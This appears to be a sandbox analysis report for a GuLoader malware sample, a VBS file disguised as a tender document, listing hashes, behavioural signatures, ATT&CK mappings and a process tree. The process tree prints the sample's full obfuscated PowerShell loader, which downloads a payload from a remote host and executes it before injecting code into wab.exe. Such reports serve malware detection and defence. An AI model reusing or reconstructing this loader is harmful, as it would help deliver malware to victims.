guloader | db9151a29924eaa6b7fd1f9395d256285deb924445e26cf383ed84722debedef

General

Target

blood Gas analyzer tender.vbs
Size

19KB
MD5

ff267c328cb452fecf9126af29565e92
SHA1

2b64e8e45343ee2adb2cb9f51039da909fa912de
SHA256

db9151a29924eaa6b7fd1f9395d256285deb924445e26cf383ed84722debedef
SHA512

9164f8b9147ec53975cf7a8d694cf04cf82ac430d3c23efc48bc574d3590e1908649c5b17b508fa94ceed08ef7d89310a68b366624a3c7c5c5332b5a7afd33ea
SSDEEP

192:yMgigjO6uXXVex0J/8NrVmb1SWyDG7+8gHkvOUfvnFn61qtHoLg3TaPK:yMgiquXXsxWOr4GDw+PHKOyJrDwK

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	3060	powershell.exe
7	3060	powershell.exe
9	3060	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2668	wab.exe
2668	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1548	powershell.exe
2668	wab.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1548 set thread context of 2668	1548	powershell.exe	34
PID 2668 set thread context of 1212	2668	wab.exe	21

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3060	powershell.exe
1548	powershell.exe
1548	powershell.exe
2668	wab.exe
2668	wab.exe
2668	wab.exe
2668	wab.exe
2668	wab.exe
2668	wab.exe
2668	wab.exe
2668	wab.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1548	powershell.exe
2668	wab.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1812 wrote to memory of 3060	1812	WScript.exe	28
PID 1812 wrote to memory of 3060	1812	WScript.exe	28
PID 1812 wrote to memory of 3060	1812	WScript.exe	28
PID 3060 wrote to memory of 2632	3060	powershell.exe	30
PID 3060 wrote to memory of 2632	3060	powershell.exe	30
PID 3060 wrote to memory of 2632	3060	powershell.exe	30
PID 3060 wrote to memory of 1548	3060	powershell.exe	32
PID 3060 wrote to memory of 1548	3060	powershell.exe	32
PID 3060 wrote to memory of 1548	3060	powershell.exe	32
PID 3060 wrote to memory of 1548	3060	powershell.exe	32
PID 1548 wrote to memory of 2580	1548	powershell.exe	33
PID 1548 wrote to memory of 2580	1548	powershell.exe	33
PID 1548 wrote to memory of 2580	1548	powershell.exe	33
PID 1548 wrote to memory of 2580	1548	powershell.exe	33
PID 1548 wrote to memory of 2668	1548	powershell.exe	34
PID 1548 wrote to memory of 2668	1548	powershell.exe	34
PID 1548 wrote to memory of 2668	1548	powershell.exe	34
PID 1548 wrote to memory of 2668	1548	powershell.exe	34
PID 1548 wrote to memory of 2668	1548	powershell.exe	34
PID 1548 wrote to memory of 2668	1548	powershell.exe	34

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1212
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\blood Gas analyzer tender.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Mormal = 1;Function Glaze($Adenomatous){$Oecology=$Adenomatous.Length-$Mormal;$bristlemouth='Substring';For( $Foregribes=5;$Foregribes -lt $Oecology;$Foregribes+=6){$Deorganization+=$Adenomatous.$bristlemouth.Invoke( $Foregribes, $Mormal);}$Deorganization;}function Unsincereness($Umbering){ . ($Demiturned) ($Umbering);}$Velarium=Glaze '.estoMHouyho Agonz A,vaiNummelBirsllJutsba prog/Fe.td5Balls.Tonat0Ddbol ,bese(EngarWJo nci BeklnAfmagdFrankoTriplwMultisPairm To,meNP auwTPri.a Che,1 .ynd0 Macr.Meppl0 Hexe; Arbe E.figWRescai Who,nP,rid6Cons.4Neu.o;Tr,nn SankexTrach6 Agri4Indp.;Tr ba Sdvanr ,rknvHen,m:Nedsk1Fil,i2Udsmi1Uddel.Genne0Nylon)V tni SamlGLett.eAgnefcDepo,kHydrooElo u/Gtzsv2Kredi0U.cru1Sabba0Mark.0Radio1P,ion0Corpo1I.cre SpontFSerpii tngerFoisoe,andafNonapoPerioxFlybo/Hjemm1Eberh2.utsp1Law.e.Toils0Side, ';$Esmakkerens105=Glaze 'AkmudUcistesHono,eSpro,ridmme-,iverASphaegConc,eWan.ln CamotKursu ';$Instruktorvagters=Glaze 'En,nth ChrytT.ngltFork,p Brsss,leut:Fyrin/styr /Fo,ekrEfemeiHe,ync st.noencomhOvertlIndigtInterd Subj.Ster,t EnkeoSemelpBlin./UdfldURetronVkiondram,ueTrichr DyopaRegiccbasunt BusteUndeldObsti. benep Bri.fLoka,bFehaa ';$Adjutator=Glaze 'Algin>Kaerl ';$Demiturned=Glaze 'AzinpiEluteePlowgxarbej ';$Skattetrkkenes='Skolebogsforfatterens';$Custlist = Glaze 'Oks.keOutwhcNyttehNe kmoKontr Busc%Her iabundepTi lepV,lnadR.medaklippt SjleaAfskn%Magne\ Gl,sGMite.a BaanrEkserlMinefeT,ica. ArisUHornkdCluefsBusli Plan& Dasy& bogb Post,eUndercSai,ihKjendoPasca winletR deb ';Unsincereness (Glaze 'Pi,pl$ Gas.g Kunsl indto.ellebtwai a Konvl Hy e:Con.eD StaaaBodybnTmrersCurree DuefuBiobisEndelsAgr,seSte a= Sove(,elatc ,athmBismedperm. Rette/ ,ostcChoi Forma$Dec.lC.ofteuEpichsEaglet ,ndelrefeeiPadlosca,unt,revv)Benzi ');Unsincereness (Glaze 'Afkld$Photog UnfrlNit,iosilv,bBolagaTrosklAkutb:Wels.UOversdIc,blfNihill N vvyFrigatPremon enheiColonn,ummygN.npueIns,an Sk,t=Mocam$MoseaIDr abn Isefs TandtIndkorFljlsuRoosekTvetutHeliuoHag srUnmodvFrmanaRichmgScroltMoneyeUdkikrDepreswinte.UnpursSilkspForewlU.plaiKugl,tOrgu,(Udlig$vaqueAFldesd LumpjArb,juBigamtSynona Gougt Ju.aoFyrrer Sabb)Carbu ');$Instruktorvagters=$Udflytningen[0];$gaeld= (Glaze ' B,gn$Kl.engop.ttl.hotooPronob Cytoa heelRegne:UndemO.alveiPandedcab,siSubreuBenedmIneff=UnverN.cripeMappewZeala-,idifO Lu tb S.enj TeateSe.rvc TasstNlden PlowbSPsykoyChillsUnapotAf laeBast,mD.spo.PentaNKrogreUnsnatHayfi.MeninWTilfleProetb LegiCMastolKlagei Scole OmlsnAkt.vt');$gaeld+=$Danseusse[1];Unsincereness ($gaeld);Unsincereness (Glaze 'Gnarr$Ta.ulOBearbiLunerd .etei WastuSpel,m Irid.SkedtHBorgeeForria midndTre,deMatutr orngsTypee[ Impl$Me,neE Tem.safbetmgar,eaHymnok Ensok,nipoeImmotrAnsvae Cov.nTornisDuski1 Pyre0Dunch5Af rg]Gastr=caves$C,culVMarque.djutl Paata K.lir EccliNonpuuMonikmOutcr ');$Mistnk=Glaze ' Pock$.tedfOmaxifi Dy,tdPaaaniR.ftmu Sandm e ua.HomelDHankeoSkraawHullen Dykkl Bra o marsaVand,dOnsigFFrontiHoejhlOrneserefra( ronv$SummeIBegronA.skesMe,brt WachrAnl,suGlosskS hizt Ban,o Anhor C,ntvUnittaVirulgPro,utRearreU.derrOverdsP,rlr,Godmo$FotosS.ootgnMispreRejs.kIndlal.lieddTaarntDisen)Rural ';$Snekldt=$Danseusse[0];Unsincereness (Glaze 'Runke$ NonmgAvenalDrazeoUdvisbemireaFashilKalum:Co reFBraverNotateSalesmEvag sAppoikFre sy Comed dplanAer.si ,rrenUnpergSprg eMet,lrMonet=A.oka(OlefiTBlikde Cents,nsbetsdrr,-DraabPGarlaaAfgrstDydsdhKli.a Tidss$PteroSP litn PrineburlikMeirkl enhidIdokutOpstr)G,raf ');while (!$Fremskydninger) {Unsincereness (Glaze 'Regis$ SolbgDadaslunfreoCe,edbOlig a irellSuper:FireaCEmueruForlorArsenrLuxemiNotateUnaud=Gibbe$VetchtFurb rAfgifu Untuephola ') ;Unsincereness $Mistnk;Unsincereness (Glaze 'ForkoSNat.rtFingeaProverBtte tBas a-StrtaSDwtkrlDecole.upineOnychpSuper li.j4Rimpl ');Unsincereness (Glaze 'P.lyg$ForhagForfrlIldsloNed.rb.lumiaG estlBrac.:KrediF LnforShibbeDuritmCarmasForeskhutchyGrammdBetnknRouseiHjemmnMarlogCircuete.kkr elo=Skumm(TarseTHer uemachssSituatStruk-GloriPSaosha.jalkt S.ephSti l Brand$StutfS,remtnNe.veeperfekaf,rilGarnidPreprtXy,it)subce ') ;Unsincereness (Glaze ' Gome$Detekg regalUn.eroD.omibPo,ybaKennelGrass:TableUKo,trn noxipRateve De acP,vebcTridiaGar ebTendelCoppeeAtwee4River9Sangr=Synt $UterigHjsp.lAt,uno Damgb ParcaFyrtolL.cti: GedeSTvin,aMedbem Sk.tmPikaresvulsnHrsktlSteamiPyntemNavignKogniiGiftsnStorhgHegeleSoubrnZeolis usik+Rov,d+Ksrln% C.is$BadmiU embrdStenhfEvasilBruchyOverdtForjanTermiiRe,agnO.havgNameaes vsmnUng.o.Rebrac rundoNor,euVandknN.nput Ahre ') ;$Instruktorvagters=$Udflytningen[$Unpeccable49];}$Fastlandenes=283013;$Arometrenes=29291;Unsincereness (Glaze 'Unitt$Cyclog Vinil Sweao Aut.bAbradaZ,punl Nond:TyfusaSmerglStrukbF rthuC.iromFrangeFagfoaPa rinFoxto Diver=Kuhni UsminG,edkme Salpt Prin-hamzaCAncieokridhnKullatLorodeUncosnDrivfttawdr Ucent$ForanS,nsvanSemideKardikHend,l BankdEndottSejtr ');Unsincereness (Glaze 'Undis$ BessgArgiflRaaj,oStr kb rummaBaasel G nn:TarrirDov.naLateraBra.hdIrwindNontee.ostst Udd. egre=.rlan Notat[CrushS R.vayBeg.ns JesttSibylePreclmNedsk.FaraoCHypocoGerlynlanisv JurieDyster .atttTraum]Cata,:Amtsr:F.ngrFRaabarSti.loTrinfmHamilBAllotaDeponsOprete Tomm6 Tele4SpidsSEmblet thacrDumpliIchnenEncrogpr la(Wolfi$De,loasmandl Iso,bOplg uPedagmAnthreKon.ta Se en Udle)embry ');Unsincereness (Glaze ' Isaf$MagnagApolllCa eroLggeibstngeaHydrolRisle:.ispesD.cerm.onrel Ska.e Un,hrDyrkeiS.rivsPsych Spon=aaben Nyanz[A.hymSFkaliyPrecosTmrestCuppieMassamP.nag.DemonT Baree igguxUndeltSamst. TretE Cy,nnRevercBullioUgestdAltaniP,stinHardeg.enfa] F,ra:Lime :SnrinA O erSflitiC CruzISengeI Mans. R,oeGRealieUnsavt olorSSynt.tBirgir ComoiRe.irnsuevig.ospi(Spora$Dampnr,ngliaDent.a.ythodbaggrdKarlee Skr tBeefb)Ext a ');Unsincereness (Glaze '.unke$ GaffgExordlPs.udoTrissbBrocaa TilrlSa ta:PersoTVatreeEnweak eptasForp tTetralVaccisLabounMagisiDo atnVi.itgMetroe Relankonto=Impac$Vensts Vivamswi,llfnikeeDags.rDrawniSkolesAloi,. ftesTomleu RepobPupp sF.lfotSubtrr Refei.undanForfrgGleng( ,unk$OvertFNoselaLivebsNonret KnapldetraaContrnL.gnod ImpeePaalin Unime ecosTe ta,Pttpr$NemopA Dr.frArteroempirmNondeeFaulttEksperS.deleSamspnBiol.eVelbesSkrue)A.utb ');Unsincereness $Tekstlsningen;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3060
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Garle.Uds && echo t"
      4⤵
      PID:2632
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Mormal = 1;Function Glaze($Adenomatous){$Oecology=$Adenomatous.Length-$Mormal;$bristlemouth='Substring';For( $Foregribes=5;$Foregribes -lt $Oecology;$Foregribes+=6){$Deorganization+=$Adenomatous.$bristlemouth.Invoke( $Foregribes, $Mormal);}$Deorganization;}function Unsincereness($Umbering){ . ($Demiturned) ($Umbering);}$Velarium=Glaze '.estoMHouyho Agonz A,vaiNummelBirsllJutsba prog/Fe.td5Balls.Tonat0Ddbol ,bese(EngarWJo nci BeklnAfmagdFrankoTriplwMultisPairm To,meNP auwTPri.a Che,1 .ynd0 Macr.Meppl0 Hexe; Arbe E.figWRescai Who,nP,rid6Cons.4Neu.o;Tr,nn SankexTrach6 Agri4Indp.;Tr ba Sdvanr ,rknvHen,m:Nedsk1Fil,i2Udsmi1Uddel.Genne0Nylon)V tni SamlGLett.eAgnefcDepo,kHydrooElo u/Gtzsv2Kredi0U.cru1Sabba0Mark.0Radio1P,ion0Corpo1I.cre SpontFSerpii tngerFoisoe,andafNonapoPerioxFlybo/Hjemm1Eberh2.utsp1Law.e.Toils0Side, ';$Esmakkerens105=Glaze 'AkmudUcistesHono,eSpro,ridmme-,iverASphaegConc,eWan.ln CamotKursu ';$Instruktorvagters=Glaze 'En,nth ChrytT.ngltFork,p Brsss,leut:Fyrin/styr /Fo,ekrEfemeiHe,ync st.noencomhOvertlIndigtInterd Subj.Ster,t EnkeoSemelpBlin./UdfldURetronVkiondram,ueTrichr DyopaRegiccbasunt BusteUndeldObsti. benep Bri.fLoka,bFehaa ';$Adjutator=Glaze 'Algin>Kaerl ';$Demiturned=Glaze 'AzinpiEluteePlowgxarbej ';$Skattetrkkenes='Skolebogsforfatterens';$Custlist = Glaze 'Oks.keOutwhcNyttehNe kmoKontr Busc%Her iabundepTi lepV,lnadR.medaklippt SjleaAfskn%Magne\ Gl,sGMite.a BaanrEkserlMinefeT,ica. ArisUHornkdCluefsBusli Plan& Dasy& bogb Post,eUndercSai,ihKjendoPasca winletR deb ';Unsincereness (Glaze 'Pi,pl$ Gas.g Kunsl indto.ellebtwai a Konvl Hy e:Con.eD StaaaBodybnTmrersCurree DuefuBiobisEndelsAgr,seSte a= Sove(,elatc ,athmBismedperm. Rette/ ,ostcChoi Forma$Dec.lC.ofteuEpichsEaglet ,ndelrefeeiPadlosca,unt,revv)Benzi ');Unsincereness (Glaze 'Afkld$Photog UnfrlNit,iosilv,bBolagaTrosklAkutb:Wels.UOversdIc,blfNihill N vvyFrigatPremon enheiColonn,ummygN.npueIns,an Sk,t=Mocam$MoseaIDr abn Isefs TandtIndkorFljlsuRoosekTvetutHeliuoHag srUnmodvFrmanaRichmgScroltMoneyeUdkikrDepreswinte.UnpursSilkspForewlU.plaiKugl,tOrgu,(Udlig$vaqueAFldesd LumpjArb,juBigamtSynona Gougt Ju.aoFyrrer Sabb)Carbu ');$Instruktorvagters=$Udflytningen[0];$gaeld= (Glaze ' B,gn$Kl.engop.ttl.hotooPronob Cytoa heelRegne:UndemO.alveiPandedcab,siSubreuBenedmIneff=UnverN.cripeMappewZeala-,idifO Lu tb S.enj TeateSe.rvc TasstNlden PlowbSPsykoyChillsUnapotAf laeBast,mD.spo.PentaNKrogreUnsnatHayfi.MeninWTilfleProetb LegiCMastolKlagei Scole OmlsnAkt.vt');$gaeld+=$Danseusse[1];Unsincereness ($gaeld);Unsincereness (Glaze 'Gnarr$Ta.ulOBearbiLunerd .etei WastuSpel,m Irid.SkedtHBorgeeForria midndTre,deMatutr orngsTypee[ Impl$Me,neE Tem.safbetmgar,eaHymnok Ensok,nipoeImmotrAnsvae Cov.nTornisDuski1 Pyre0Dunch5Af rg]Gastr=caves$C,culVMarque.djutl Paata K.lir EccliNonpuuMonikmOutcr ');$Mistnk=Glaze ' Pock$.tedfOmaxifi Dy,tdPaaaniR.ftmu Sandm e ua.HomelDHankeoSkraawHullen Dykkl Bra o marsaVand,dOnsigFFrontiHoejhlOrneserefra( ronv$SummeIBegronA.skesMe,brt WachrAnl,suGlosskS hizt Ban,o Anhor C,ntvUnittaVirulgPro,utRearreU.derrOverdsP,rlr,Godmo$FotosS.ootgnMispreRejs.kIndlal.lieddTaarntDisen)Rural ';$Snekldt=$Danseusse[0];Unsincereness (Glaze 'Runke$ NonmgAvenalDrazeoUdvisbemireaFashilKalum:Co reFBraverNotateSalesmEvag sAppoikFre sy Comed dplanAer.si ,rrenUnpergSprg eMet,lrMonet=A.oka(OlefiTBlikde Cents,nsbetsdrr,-DraabPGarlaaAfgrstDydsdhKli.a Tidss$PteroSP litn PrineburlikMeirkl enhidIdokutOpstr)G,raf ');while (!$Fremskydninger) {Unsincereness (Glaze 'Regis$ SolbgDadaslunfreoCe,edbOlig a irellSuper:FireaCEmueruForlorArsenrLuxemiNotateUnaud=Gibbe$VetchtFurb rAfgifu Untuephola ') ;Unsincereness $Mistnk;Unsincereness (Glaze 'ForkoSNat.rtFingeaProverBtte tBas a-StrtaSDwtkrlDecole.upineOnychpSuper li.j4Rimpl ');Unsincereness (Glaze 'P.lyg$ForhagForfrlIldsloNed.rb.lumiaG estlBrac.:KrediF LnforShibbeDuritmCarmasForeskhutchyGrammdBetnknRouseiHjemmnMarlogCircuete.kkr elo=Skumm(TarseTHer uemachssSituatStruk-GloriPSaosha.jalkt S.ephSti l Brand$StutfS,remtnNe.veeperfekaf,rilGarnidPreprtXy,it)subce ') ;Unsincereness (Glaze ' Gome$Detekg regalUn.eroD.omibPo,ybaKennelGrass:TableUKo,trn noxipRateve De acP,vebcTridiaGar ebTendelCoppeeAtwee4River9Sangr=Synt $UterigHjsp.lAt,uno Damgb ParcaFyrtolL.cti: GedeSTvin,aMedbem Sk.tmPikaresvulsnHrsktlSteamiPyntemNavignKogniiGiftsnStorhgHegeleSoubrnZeolis usik+Rov,d+Ksrln% C.is$BadmiU embrdStenhfEvasilBruchyOverdtForjanTermiiRe,agnO.havgNameaes vsmnUng.o.Rebrac rundoNor,euVandknN.nput Ahre ') ;$Instruktorvagters=$Udflytningen[$Unpeccable49];}$Fastlandenes=283013;$Arometrenes=29291;Unsincereness (Glaze 'Unitt$Cyclog Vinil Sweao Aut.bAbradaZ,punl Nond:TyfusaSmerglStrukbF rthuC.iromFrangeFagfoaPa rinFoxto Diver=Kuhni UsminG,edkme Salpt Prin-hamzaCAncieokridhnKullatLorodeUncosnDrivfttawdr Ucent$ForanS,nsvanSemideKardikHend,l BankdEndottSejtr ');Unsincereness (Glaze 'Undis$ BessgArgiflRaaj,oStr kb rummaBaasel G nn:TarrirDov.naLateraBra.hdIrwindNontee.ostst Udd. egre=.rlan Notat[CrushS R.vayBeg.ns JesttSibylePreclmNedsk.FaraoCHypocoGerlynlanisv JurieDyster .atttTraum]Cata,:Amtsr:F.ngrFRaabarSti.loTrinfmHamilBAllotaDeponsOprete Tomm6 Tele4SpidsSEmblet thacrDumpliIchnenEncrogpr la(Wolfi$De,loasmandl Iso,bOplg uPedagmAnthreKon.ta Se en Udle)embry ');Unsincereness (Glaze ' Isaf$MagnagApolllCa eroLggeibstngeaHydrolRisle:.ispesD.cerm.onrel Ska.e Un,hrDyrkeiS.rivsPsych Spon=aaben Nyanz[A.hymSFkaliyPrecosTmrestCuppieMassamP.nag.DemonT Baree igguxUndeltSamst. TretE Cy,nnRevercBullioUgestdAltaniP,stinHardeg.enfa] F,ra:Lime :SnrinA O erSflitiC CruzISengeI Mans. R,oeGRealieUnsavt olorSSynt.tBirgir ComoiRe.irnsuevig.ospi(Spora$Dampnr,ngliaDent.a.ythodbaggrdKarlee Skr tBeefb)Ext a ');Unsincereness (Glaze '.unke$ GaffgExordlPs.udoTrissbBrocaa TilrlSa ta:PersoTVatreeEnweak eptasForp tTetralVaccisLabounMagisiDo atnVi.itgMetroe Relankonto=Impac$Vensts Vivamswi,llfnikeeDags.rDrawniSkolesAloi,. ftesTomleu RepobPupp sF.lfotSubtrr Refei.undanForfrgGleng( ,unk$OvertFNoselaLivebsNonret KnapldetraaContrnL.gnod ImpeePaalin Unime ecosTe ta,Pttpr$NemopA Dr.frArteroempirmNondeeFaulttEksperS.deleSamspnBiol.eVelbesSkrue)A.utb ');Unsincereness $Tekstlsningen;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Garle.Uds && echo t"
        5⤵
        
        PID:2580
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8a21aba1ae505d99a8f717e9d254b66b

SHA1
a15c308598e851660cea1b89fe3cd31d7e0da33d

SHA256
dd0276a437450fe92d25582fc9f7f287a290895e5ea1b947ead1663ac20adce5

SHA512
2d5f42c3e4c8ff47e05373e333b481349c5710b2c762ebe1985dd56615ca67a5bfd658d3bf15ee8181ce24658db94fc169de890b0dd2515bc5e2dd03ef1112f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab39C8.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3A99.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Garle.Uds

Filesize
406KB

MD5
0f461f618bf51b8108fae07fe2f3b7a7

SHA1
0c756e48c06ca86ba6bb68b93ed3edf2b9866299

SHA256
3b0f399980a40a29429f39f9e09c068738812a9078672e48c145aa0465526f78

SHA512
4c8e9cc48fdd8fa4b5e93fd22f15530627de38d9ebc54689549c95d78500262ebd8ecdc29a176769a476d17f14c5907a8786046fbb05de81838c98bdef0541bf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6NRVQX0H5DSJRK3PSJ2R.temp

Filesize
7KB

MD5
6cc68d497a786b144586e5407c2d4649

SHA1
82a8bb312c326fb796c344640e682790d860a1b6

SHA256
716778cda7cf9e319c977f973b768e9bacb2fd827868e9bc6e7e376f05742eea

SHA512
11ebdb674f7c92938910c05fc2222014170d98f54d9a4c116ee9f0dd225c2eda277ec31236ec055d07588976f0c3d8b2cf37393de0e6947b203be07e01c2f48a

Download Submit
memory/1548-82-0x0000000006650000-0x000000000A80D000-memory.dmp

Filesize
65.7MB

Download
memory/2668-92-0x0000000000F70000-0x000000000512D000-memory.dmp

Filesize
65.7MB

Download
memory/2668-86-0x0000000000F70000-0x000000000512D000-memory.dmp

Filesize
65.7MB

Download
memory/3060-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/3060-7-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3060-6-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3060-4-0x000007FEF59DE000-0x000007FEF59DF000-memory.dmp

Filesize
4KB

Download
memory/3060-8-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/3060-83-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3060-84-0x000007FEF59DE000-0x000007FEF59DF000-memory.dmp

Filesize
4KB

Download
memory/3060-9-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3060-87-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3060-10-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing